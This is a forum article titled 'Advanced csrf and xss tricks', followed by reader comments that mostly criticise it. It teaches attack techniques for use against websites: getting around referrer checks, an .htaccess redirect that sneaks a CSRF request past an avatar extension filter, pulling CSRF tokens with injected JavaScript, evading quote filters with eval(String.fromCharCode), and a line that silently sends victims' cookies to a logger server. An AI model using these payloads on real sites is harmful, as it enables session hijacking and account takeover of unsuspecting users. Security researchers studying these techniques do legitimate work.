Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Advanced csrf and xss tricks


Advanced csrf and xss tricks

By ghostghost | 14177 Reads |
0     0

I was active here when I was a little younger, and learnt a lot. Now I am back, with more knowledge on web hacking. And I want to share this knowledge with you, just like I learned from the articles here when I was a newbie myself long ago.

You need to know beyond the basics of xss and csrf to have any use of this text.

HOW TO CLEAN THE REFERRER

Sometimes when you got a csrf exploit ready, you notice that if the referrer is not the domain where your exploit goes to, it gets rejected. What you have to do then, is to clean the referrer.

To do this, you have to clean the referrer by doing this:

Remember to remove the space between java and script. This code will create an iframe with the javascript: thingie, create a form on that blank page, and submit it. This will make the referrer clean, and you will circumvent any referrer checks.

If they dont even accept blank referrers, I dont think theres anything you can do about it.

HOW TO CURCUMVENT FILE EXTENSION CHECKS

On forums and online communities you can often use an avatar, which you link from the web. And very often, only extensions like .jpg .png etc are allowed. What you have to do then, is to use apache’s htaccess.

Make a folder on your webspace. Make a .htaccess file with the following content:

Redirect http://yay.com/pic.jpg http://csrf_here

The extension filter will not trigger. But when the image is displayed, the browser will find the http 301 redirect, and fetch the new page.

This way, you can redirect to logout.php or delete.php?id=34 etc.

Note that this cannot be used to redirect to POST csrf exploits. Because the browser does not interpret the html response code, it only queries it.

Additionally you can do fun stuff like redirecting to mailto:evil_popup or other protocols. Redirecting to java script: does not work though, and thank god for that.

HOW TO DO CSRF WHEN THERE ARE TOKEN CHECKS

If you make a csrf exploit which changes name, email or whatever, you may see that the site uses tokens to prevent this. To circumvent this, you need to find an xss flaw. When you find one, you can inject js, which will fetch the tokens which are needed.

http://pastebin.com/m7203ede5 Take a look at this code

This code will query /editprofile. The html code of that page contains the token, which is needed to change things.

This is the most interesting part:

data = ajaxRequest.responseText; k = data.match(“[0-9]{32}“);

This is called a regular expresblockedsion. And it will search the html code for a number, which is exactly 32 digits long. And there is only one number which is that long, and thats our token.

This token will be stored in the variable k. Then you use that token to do another ajax request, or you can create a new form dynamically and submit it. The point is, with the fethed token, you can do what you want. Change email, password, deleteaccount, change status etc.

This token fetching is very often needed when creating an xss worm.

wHAT TO DO IF QOUTES ARE FILTERED AWAY

Very often, you find that “ and ’ are escaped, replaced or removed. In that case, code like this wont work:

document.location.href=“http://csrf”

Because the “ are escaped.

To make code which has no “ or ’ in it, you can use js’s function fromCharCode().

http://www.wocares.com/noquote.php Use this tool to encode your js.

E.g. to make alert(“yo”) work, the code would be like this:

String.fromCharCode(97,108,101,114,116,40,54,41)

This code alone wont make the alert work. You need to wrap it around the eval() function, like this:

eval(String.fromCharCode(97,108,101,114,116,40,54,41))

HOW TO SILENTLY STEAL COOKIES

The document.location.href is quite noisy, and people will kind of understand something not good is happening. But theres a way to send off the cookies by doing this:

new Image().src=‘http://logger.php?cookie=’+document.cookie

This wont send the user anywhere, but silently send the cookies off to your server.

FINAL WORDS

I hope you learned something from this text, and that you give it a 10/10.

If the feedback is good, I am going to write more advanced stuff on this subject :) Feedback on the language/grammatics is also wanted, because english isnt my main language.

Comments
clone4's avatar
clone4 15 years ago

poorly structured, and I'm sorry but one sentence a paragraph? Techniques presented in rather 'newbie' non technical way, and are random collection of exploit techniques, rather then logically following order of advanced exploits. Also most of the stuff desribed in the article is hardly 'advanced' stuff, I mean with xss, one of the first things you learn is how to avoid quotes and double quotes… Unless you improve it, add more information, more techniques and more explanations, it will be poor from me

ghost's avatar
ghost 15 years ago

Very poor formatting. Almost can't make out where a real paragraph begins or ends. And clone4 pretty much got it all in his comment.

spyware's avatar
spyware 15 years ago

Ugh. "Advanced".

ghost's avatar
ghost 15 years ago

Yeah, this isn't advanced. This is basic shit and I'm pretty sure we already have a few articles that covers pretty much everything in this one. Poor. Oh, and you don't need to use eval() with the char code. You can just use it like this: alert(String.fromCharCode(88, 83, 83))

ghost's avatar
ghost 15 years ago

We need better moderation of articles.

Poor

korg's avatar
korg 15 years ago

MEH!

fashizzlepop's avatar
fashizzlepop 15 years ago

Personally, The Very Hungry Caterpillar just made me hungry. This actually showed me how to clean the refferer. I wouldn't mind another article about more advanced stuff.

Rate: "Average"

ghost's avatar
ghost 15 years ago

Jeez, tough crowd. It was alright?

I liked the file extension checks, that actually would have exploited a script I recently wrote. Looks like i'm going to go fix that! xD

Mtutnid's avatar
Mtutnid 14 years ago

I can't believe that twitter was vulnerable to XSS until this year. :D:D

DonMilano's avatar
DonMilano 12 years ago

"advanced" tricks? from who's point of view dude?:o c'est vraiment terrible…